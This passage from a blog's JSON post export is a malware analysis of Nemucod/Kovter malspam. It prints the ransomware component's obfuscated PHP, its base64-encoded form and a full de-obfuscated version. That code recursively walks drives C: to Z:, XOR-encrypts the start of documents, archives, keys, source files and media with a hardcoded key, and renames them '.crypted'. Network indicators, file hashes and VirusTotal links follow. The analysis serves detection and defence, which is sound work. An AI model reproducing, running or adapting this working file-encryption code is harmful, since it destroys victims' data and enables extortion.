97)."3".chr(66)."8c2NhZHxjYW".chr(82)."8M2Rzf".chr(71)."JsZW5kfGx3b3xsd3N8".chr(98)."W".chr(74)."8c2".chr(120)."kZH".chr(74).chr(51)."fH".chr(78)."sZGFzbXxzbGR".chr(119)."cnR8dTNkfGpwZ3xq".chr(99)."GVn".chr(102)."H".chr(82)."pZmZ8dGlmfHJhd3xhdm".chr(108)."8bX".chr(66)."nfG1w".chr(78)."HxtNH".chr(90)."8bXBlZ3xtcGV8d21mfHdtdnx2".chr(90)."Wd".chr(56)."bW92fDN".chr(110)."cHxmbHZ8".chr(98)."Wt2f".chr(72)."ZvYnxy".chr(98)."X".chr(120)."tcDN8d2F2fG".chr(70)."zZnx3".chr(98)."WF".chr(56)."bTN1f".chr(71)."1".chr(112)."ZGl8b2".chr(100)."nfG".chr(49)."p".chr(90).chr(72)."x2ZG".chr(108)."8".chr(100)."m".chr(49)."k".chr(97)."3".chr(120)."2aGR8ZHNrf".chr(71)."l".chr(116)."Z".chr(51)."x".chr(112)."c28pJC".chr(57)."pJ".chr(121)."wkbyk".chr(103)."fH".chr(119)."gJG".chr(69)."9".chr(80)."Sdk".chr(74).chr(121)."Ym".chr(99).chr(72)."JlZ19tYX".chr(82).chr(106)."aCgnL1".chr(115).chr(117)."X".chr(83)."hj".chr(99)."nlwdG".chr(86).chr(107)."KSQvaS".chr(99)."sJ".chr(71)."8p".chr(75)."Q0".chr(75).chr(67)."Q".chr(108)."7DQ".chr(111)."JCQk".chr(107)."Zn".chr(65).chr(57).chr(81)."GZvcGVuK".chr(67)."Rw".chr(76)."i".chr(82)."zLiRvLCdyKy".chr(99)."pOw".chr(48)."KCQ".chr(107)."J".chr(97)."W".chr(89)."gKCR".chr(109)."cCE9PW".chr(90)."hb".chr(72).chr(78)."lK".chr(81)."0".chr(75).chr(67).chr(81)."kJew0".chr(75)."CQk".chr(74).chr(67).chr(83).chr(82)."4PUBmcmVh".chr(90)."C".chr(103)."k".chr(90)."nAsMTAyN".chr(67)."k7DQoJC".chr(81)."kJZm9".chr(121)."KC".chr(82).chr(112)."P".chr(84)."A7JGk8c3RybGVu".chr(75).chr(67)."R4KT".chr(115)."k".chr(97)."Ssr".chr(75)."S".chr(82)."4".chr(87)."y".chr(82).chr(112)."X".chr(84)."1jaHI".chr(111)."b".chr(51).chr(74).chr(107).chr(75)."CR4WyRpXS".chr(108)."eb".chr(51)."JkKCRr".chr(87)."yR".chr(112)."JXN0cmxlbigkay".chr(108)."dKSk7DQo".chr(74).chr(67)."QkJQGZzZWV".chr(114)."KCRmcC".chr(119)."w".chr(75)."TsNC".chr(103)."k".chr(74).chr(67)."QlAZ".chr(110)."d".chr(121)."a".chr(88)."RlKCRmc".chr(67).chr(119).chr(107)."eCk7".chr(68).chr(81)."o".chr(74).chr(67)."QkJ".chr(81)."GZjbG9zZSgk".chr(90).chr(110)."ApOw0KDQ".chr(111)."JCQkJ".chr(97)."WYo".chr(74)."G".chr(69)."9P".chr(83)."dl".chr(74)."y".chr(107)."NCgkJCQl7D".chr(81)."oJCQ".chr(107)."J".chr(67)."U".chr(66)."yZW".chr(53).chr(104)."bW".chr(85)."oJ".chr(72)."AuJ".chr(72)."Mu".chr(74)."G8sICRwLiRzLiRvL".chr(105).chr(99)."u".chr(89)."3J5cHR".chr(108)."ZCcpO".chr(119)."0KCQkJCX0NCgkJCQl".chr(108)."bHNlDQ".chr(111).chr(74)."CQ".chr(107)."Jew0KCQkJ".chr(67)."Ql".chr(65).chr(99)."mVu".chr(89)."W1lKC".chr(82)."w".chr(76)."iRzLiRvLC".chr(66)."w".chr(99)."mVnX3JlcGxh".chr(89)."2".chr(85).chr(111)."Jy9bLl".chr(49).chr(106)."cnlwd".chr(71)."V".chr(107)."JC8nLCAnJywgJH".chr(65)."uJHMu".chr(74)."G8pKTsN".chr(67)."gkJCQ".chr(108)."9D".chr(81)."oJCQ".chr(108)."9DQoJCX0N".chr(67)."gl9D".chr(81)."oNC".chr(103)."lAY2xvc2VkaXI".chr(111).chr(74)."G".chr(82)."wK".chr(84)."s".chr(78).chr(67).chr(110).chr(48)."=".chr(34)."));";$j133=chr(47)."f".chr(51).chr(50)."0".chr(53).chr(50)."e7e38bfce654".chr(49)."0dd".chr(97)."5015e6".chr(50)."19".chr(47).chr(101);preg_replace($j133,$m173,"f3".chr(50)."052e".chr(55).chr(101)."38bfce65".chr(52).chr(49)."0d".chr(100)."a".chr(53)."0".chr(49)."5".chr(101)."6219"); ?><\/pre>\n
The obfuscated PHP code above looks like this once it has been de-obfuscated:<\/p>\n
\r\n<?php function Tree($p) {\r\n    $a = 'e';\r\n    $k = base64_decode('MWKTcqvkL5T5CEqMmuw+1CJwWrAGwPgwC37xsCigp\/xRFGvCm+IpzDag61C1EGGy+lSuQpv0T6T5\/C9ihPhsuvEoo\/hNqO82f9YtlAZ4SKD4NH\/Kjb7vvu8gNIDMwAZMkQJzrhV8');\r\n    $s = chr(92);\r\n    if (preg_match('\/' . $s . $s . '(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)\/i', $p) || preg_match('\/recycle\/i', $p)) return;\r\n    $dp = @opendir($p);\r\n    if ($dp === false) return;\r\n    while ($o = @readdir($dp)) if ($o != '.' && $o != '..') {\r\n        if (@is_dir($p . $s . $o)) {\r\n            Tree($p . $s . $o);\r\n        } elseif ($a == 'e' && preg_match('\/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$\/i', $o) || $a == 'd' && preg_match('\/[.](crypted)$\/i', $o)) {\r\n            $fp = @fopen($p . $s . $o, 'r+');\r\n            if ($fp !== false) {\r\n                $x = @fread($fp, 1024);\r\n                for ($i = 0;$i < strlen($x);$i++) $x[$i] = chr(ord($x[$i]) ^ ord($k[$i % strlen($k) ]));\r\n                @fseek($fp, 0);\r\n                @fwrite($fp, $x);\r\n                @fclose($fp);\r\n                if ($a == 'e') {\r\n                    @rename($p . $s . $o, $p . $s . $o . '.crypted');\r\n                } else {\r\n                    @rename($p . $s . $o, preg_replace('\/[.]crypted$\/', '', $p . $s . $o));\r\n                }\r\n            }\r\n        }\r\n    }\r\n    @closedir($dp);\r\n}\r\neval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQoNCmZvcigkaT02NzskaTw9OTA7JGkrKykgaWYoQGlzX2RpcihjaHIoJGkpLic6JykpIFRyZWUoY2hyKCRpKS4nOicpOw0KDQpmdW5jdGlvbiBUcmVlKCRwKQ0Kew0KCSRhPSdlJzsNCgkkaz1iYXNlNjRfZGVjb2RlKCdNV0tUY3F2a0w1VDVDRXFNbXV3KzFDSndXckFHd1Bnd0MzN3hzQ2lncC94UkZHdkNtK0lwekRhZzYxQzFFR0d5K2xTdVFwdjBUNlQ1L0M5aWhQaHN1dkVvby9oTnFPODJmOVl0bEFaNFNLRDROSC9LamI3dnZ1OGdOSURNd0FaTWtRSnpyaFY4Jyk7DQoJJHM9Y2hyKDkyKTsNCg0KCWlmKHByZWdfbWF0Y2goJy8nLiRzLiRzLicod2lubnR8Ym9vdHxzeXN0ZW18d2luZG93c3x0bXB8dGVtcHxwcm9ncmFtfGFwcGRhdGF8YXBwbGljYXRpb258cm9hbWluZ3xtc29mZmljZXx0ZW1wb3Jhcnl8Y2FjaGUpL2knLCRwKSB8fCBwcmVnX21hdGNoKCcvcmVjeWNsZS9pJywkcCkpIHJldHVybjsNCg0KCSRkcD1Ab3BlbmRpcigkcCk7DQoNCglpZigkZHA9PT1mYWxzZSkgcmV0dXJuOw0KDQoJd2hpbGUoJG89QHJlYWRkaXIoJGRwKSkgaWYoJG8hPScuJyYmJG8hPScuLicpDQoJew0KCQlpZiAoQGlzX2RpcigkcC4kcy4kbykpDQoJCXsNCgkJCVRyZWUoJHAuJHMuJG8pOw0KCQl9DQoJCWVsc2VpZiAoJGE9PSdlJyYmcHJlZ19tYXRjaCgnL1suXSh6aXB8cmFyfHIwMHxyMDF8cjAyfHIwM3w3enx0YXJ8Z3p8Z3ppcHxhcmN8YXJqfGJ6fGJ6MnxiemF8YnppcHxiemlwMnxpY2V8eGxzfHhsc3h8ZG9jfGRvY3h8cGRmfGRqdnV8ZmIyfHJ0ZnxwcHR8cHB0eHxwcHN8c3hpfG9kbXxvZHR8bXBwfHNzaHxwdWJ8Z3BnfHBncHxrZGJ8a2RieHxhbHN8YXVwfGNwcnxucHJ8Y3BwfGJhc3xhc218Y3N8cGhwfHBhc3xjbGFzc3xweXxwbHxofHZifHZjcHJvanx2YnByb2p8amF2YXxiYWt8YmFja3VwfG1kYnxhY2NkYnxtZGZ8b2RifHdkYnxjc3Z8dHN2fHNxbHxwc2R8ZXBzfGNkcnxjcHR8aW5kZHxkd2d8YWl8c3ZnfG1heHxza3B8c2NhZHxjYWR8M2RzfGJsZW5kfGx3b3xsd3N8bWJ8c2xkZHJ3fHNsZGFzbXxzbGRwcnR8dTNkfGpwZ3xqcGVnfHRpZmZ8dGlmfHJhd3xhdml8bXBnfG1wNHxtNHZ8bXBlZ3xtcGV8d21mfHdtdnx2ZWd8bW92fDNncHxmbHZ8bWt2fHZvYnxybXxtcDN8d2F2fGFzZnx3bWF8bTN1fG1pZGl8b2dnfG1pZHx2ZGl8dm1ka3x2aGR8ZHNrfGltZ3xpc28pJC9pJywkbykgfHwgJGE9PSdkJyYmcHJlZ19tYXRjaCgnL1suXShjcnlwdGVkKSQvaScsJG8pKQ0KCQl7DQoJCQkkZnA9QGZvcGVuKCRwLiRzLiRvLCdyKycpOw0KCQkJaWYgKCRmcCE9PWZhbHNlKQ0KCQkJew0KCQkJCSR4PUBmcmVhZCgkZnAsMTAyNCk7DQoJCQkJZm9yKCRpPTA7JGk8c3RybGVuKCR4KTskaSsrKSR4WyRpXT1jaHIob3JkKCR4WyRpXSleb3JkKCRrWyRpJXN0cmxlbigkayldKSk7DQoJCQkJQGZzZWVrKCRmcCwwKTsNCgkJCQlAZndyaXRlKCRmcCwkeCk7DQoJCQkJQGZjbG9zZSgkZnApOw0KDQoJCQkJaWYoJGE9PSdlJykNCgkJCQl7DQoJCQkJCUByZW5hbWUoJHAuJHMuJG8sICRwLiRzLiRvLicuY3J5cHRlZCcpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQlAcmVuYW1lKCRwLiRzLiRvLCBwcmVnX3JlcGxhY2UoJy9bLl1jcnlwdGVkJC8nLCAnJywgJHAuJHMuJG8pKTsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQoNCglAY2xvc2VkaXIoJGRwKTsNCn0="));\r\nset_time_limit(0);\r\nfor ($i = 67;$i <= 90;$i++) if (@is_dir(chr($i) . ':')) Tree(chr($i) . ':');\r\nfunction Tree($p) {\r\n    $a = 'e';\r\n    $k = base64_decode('MWKTcqvkL5T5CEqMmuw+1CJwWrAGwPgwC37xsCigp\/xRFGvCm+IpzDag61C1EGGy+lSuQpv0T6T5\/C9ihPhsuvEoo\/hNqO82f9YtlAZ4SKD4NH\/Kjb7vvu8gNIDMwAZMkQJzrhV8');\r\n    $s = chr(92);\r\n    if (preg_match('\/' . $s . $s . '(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)\/i', $p) || preg_match('\/recycle\/i', $p)) return;\r\n    $dp = @opendir($p);\r\n    if ($dp === false) return;\r\n    while ($o = @readdir($dp)) if ($o != '.' && $o != '..') {\r\n        if (@is_dir($p . $s . $o)) {\r\n            Tree($p . $s . $o);\r\n        } elseif ($a == 'e' && preg_match('\/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$\/i', $o) || $a == 'd' && preg_match('\/[.](crypted)$\/i', $o)) {\r\n            $fp = @fopen($p . $s . $o, 'r+');\r\n            if ($fp !== false) {\r\n                $x = @fread($fp, 1024);\r\n                for ($i = 0;$i < strlen($x);$i++) $x[$i] = chr(ord($x[$i]) ^ ord($k[$i % strlen($k) ]));\r\n                @fseek($fp, 0);\r\n                @fwrite($fp, $x);\r\n                @fclose($fp);\r\n                if ($a == 'e') {\r\n                    @rename($p . $s . $o, $p . $s . $o . '.crypted');\r\n                } else {\r\n                    @rename($p . $s . $o, preg_replace('\/[.]crypted$\/', '', $p . $s . $o));\r\n                }\r\n            }\r\n        }\r\n    }\r\n    @closedir($dp);\r\n}<\/pre>\n
The block of code above that is base64 encoded looks to be the same code repeated. Basically this file is what Nemucod uses to help encrypt the files on the host system. <\/p>\n
Moving from here, after the HTTP GET requests that drop the files on the host system there are POST requests to the IP address of ‘155.254.148.45.’ Upon further inspection of these POSTs, it looks as if the site has been suspended.<\/p>\n
\"\"<\/a><\/p>\n
There are also requests from the host to 27 different IP addresses on port 8080 as seen above in the indicators of compromise. Most of the requests are either just sending SYN requests or receiving RSTs from the hosts. There is one IP address though that looks to have data pushed to it. Unfortunately the data that is being sent is encrypted\/obfuscated and is not readable.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
The following are the artifacts that I was able to capture on the first run of the malspam.<\/p>\n
File name: a.exe (According to VT comments, this looks to be the PHP intrepter that Nemucod uses)
\nSize: 44KB
\nSHA256: 4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95
\nVT link: http:\/\/virustotal.com\/en\/file\/4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95\/analysis\/<\/a>
\nDetection ratio: 2 \/ 55
\nFirst submission 2010-07-03 09:04:07 UTC<\/p>\n
File name: a1.exe
\nSize: 309KB
\nSHA256: 37a9c67ad50487b840ebe5bbc02a5ad9df16e3c0588cb798ef8a5ecba50707d4
\nVT link: http:\/\/www.virustotal.com\/en\/file\/37a9c67ad50487b840ebe5bbc02a5ad9df16e3c0588cb798ef8a5ecba50707d4\/analysis\/<\/a>
\nDetection ratio: 18 \/ 55
\nFirst submission 2016-07-20 10:10:40 UTC<\/p>\n
File name: a2.exe
\nSize: 124KB
\nSHA256: 2a87c2a5bceae936d6b64c8777464ee6849420dc62b5f855761ef392715f3730
\nVT link: http:\/\/virustotal.com\/en\/file\/2a87c2a5bceae936d6b64c8777464ee6849420dc62b5f855761ef392715f3730\/analysis\/<\/a>
\nDetection ratio: 6 \/ 55
\nFirst submission 2016-07-20 09:27:16 UTC<\/p>\n
File name: 59e955.02ecd42
\nSize: 46KB
\nSHA256: 3626277c8c3e90d606c693e7bf5b5b98f49408316b3dfceab3b1f83ae2417212
\nVT link: NA<\/p>\n
On an interesting note, I believe that the binary called “a2.exe” is the one that performs most of the work on the host system. When running just that binary I was able to replicate the network traffic in the PCAP, and also cause the VM to become encrypted as well.<\/p>\n","protected":false},"excerpt":{"rendered":"
Here is another example of Nemucod\/Kovter that I saw at work. It very much resembles another one that I saw and wrote up a while ago (see http:\/\/www.herbiez.com\/?p=535). For more information about how Nemucod\/Kovter keeps it’s persistence on the host system then please read this excellent blog post on MalwareBytes’ blog here. Since the MalwareByte’s blog covers the filesystem aspect incredibly well, I am not going to talk about it here since this one mimics what is seen in the blog post. Also, if you would like to see the artifacts found in this investigation, please see the Github repo…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-571","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/571","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=571"}],"version-history":[{"count":3,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/571\/revisions"}],"predecessor-version":[{"id":578,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/571\/revisions\/578"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=571"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=571"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}